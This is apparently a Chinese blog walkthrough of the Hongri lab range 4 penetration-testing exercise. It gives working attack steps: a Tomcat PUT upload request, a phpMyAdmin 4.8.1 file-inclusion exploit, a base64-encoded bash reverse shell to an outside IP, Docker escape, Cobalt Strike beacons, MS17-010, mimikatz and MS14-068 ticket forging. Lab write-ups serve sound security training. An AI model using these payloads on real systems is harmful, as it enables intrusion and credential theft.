Skip to main content

红日靶场4

·242 words·2 mins
IIIIIIIIIIII
Author
IIIIIIIIIIII
A little bit about you

红日靶场4—
#

一共三台主机 一台双网卡1公网和内网网段 还有两台一台DC 一台WIN7 内网网段为183

Getshell
#

发现公网开了3个奇怪端口我们访问

nmap
NMAP扫描

2001端口getshell
#

2001一看就是Struct2 直接工具getshell 第一个———2001

nmap
NMAP扫描

nmap
NMAP扫描

nmap
NMAP扫描

上传JSP哥斯拉getshell

nmap
NMAP扫描

2002端口
#

没有管理界面

nmap
NMAP扫描

https://www.exploit-db.com/exploits/42953  tomcat  PUT  CVE

PUT /1.jsp/ HTTP/1.1
Host: 192.168.3.103:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.3.103:8080/examples/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4,zh-TW;q=0.2
Cookie: JSESSIONID=A27674F21B3308B4D893205FD2E2BF94
Connection: close
Content-Length: 26
    
<% out.println("hello");%>

nmap
NMAP扫描

这里我们写入哥斯拉的shell连接

nmap
NMAP扫描

2003端口
#

nmap
NMAP扫描

里面右下角有admin版本4.8.1

POC利用

phpmyadmin 4.8.1 远程文件包含漏洞 利用
http://192.168.1.188:2003/index.php?target=db_datadict.php%253f/../../../../../../
etc/passwd

我们可以包含
执行 SELECT '<?php phpinfo();?>' 时,PHP 会把查询结果(即字符串 <?php phpinfo();?> )通过 Session 机制存储(比如写入 $_SESSION 或直接落地到 Session 文件)。
---Session 的本质是 “服务器存储用户数据的容器”,并非只能存 “登录信息” 。--
 
select '<?php phpinfo();?>' 这个session
旧版本:sess_ + session_id
新版本:可能直接用 session_id,但历史场景中大量存在 sess_ 前缀的习惯。
通常在/tmp
http://192.168.1.188:2003/index.php?target=db_datadict.php%253f/../../../../../../
tmp/sess_6dd19ff2088d22ac4b1bfb67db1a68a5

select '<?php system(base64_decode("YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMTYuNjIuMzIuNjQvODA4MCAwPiYxIg==")) ?>' 反弹

看下session

nmap
NMAP扫描

nmap
NMAP扫描

反弹shell

nmap
NMAP扫描

docker提权
#

tomcatshell里面发现了是在docker环境

nmap
NMAP扫描

并且是特权 我们可以使用挂载逃逸

把/dev/sda1 挂载过去 建立文件夹 niko下面

写入公钥到root里面

登录试试
这里仅仅限制tomcat docker提权 其余两个shell没找到提权方法

nmap
NMAP扫描

这里我也试了定时任务但是就是不行

nmap
NMAP扫描

并且可以看到确定是写入进去了的

nmap
NMAP扫描

最后还是密钥登录拿到web全部权限

nmap
NMAP扫描

内网渗透
#

启动我们的CS上线下第一台linux shell 这里用插件linux上线

genCrossC2.Linux ip tcp ./.cobaltstrike.beacon_keys null Linux x64 3.out 

nmap
NMAP扫描

生成开一个python3 对面用wget下载执行上线

nmap
NMAP扫描

成功上线web

nmap
NMAP扫描

发现另外一张网卡183 我们可以扫描下

nmap
NMAP扫描

fsCAN扫描结果

nmap
NMAP扫描

这里我用CS建立linux隧道没有成功换一个C2工具

nmap
NMAP扫描

本地可以访问内网了使用ms17010扫描

nmap
NMAP扫描

然后用msfconsle代理下socks扫描

use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.183.129
setg Proxies socks5:116.62.32.64:36666 

nmap
NMAP扫描

拿下了win7

nmap
NMAP扫描

使用mimikatz抓取密码开启3389登录上去

nmap
NMAP扫描

然后使用MS14-068 注入但是我这里不知道为什么一直不成功

命令如下生成后注入进去

这里修改管理员密码

net user administrator Admin12345  

net user administrator Admin12345 /active:yes   后激活rdp

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 打开3389

登录使用ms14-068

cd \Users\douser\Desktop
MS14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.131 -p Dotest123

mimikatz.exe
kerberos::purge 清空
kerberos::list
kerberos::ptc TGT_douser@DEMO.com.ccache

dir \\WIN-ENS2VR5TR3N\C$
然后可以访问DC C盘

我这里能是建立了连接net use 如果你成功了注入了可以直接执行 
下一步就是有了最高权限就是关闭防火墙这时候能用ms17010打DC了

nmap
NMAP扫描

Related

红日靶场7-WP-MS17-010-WMI-laravel-docker-exp
Wechat渗透相关抓包反编译
·56 words·1 min
XuanJi靶机---难度low知识点-Git,TOTP
·45 words·1 min
nuclei-POC编写
·248 words·2 mins
自动化漏洞扫描工具
·65 words·1 min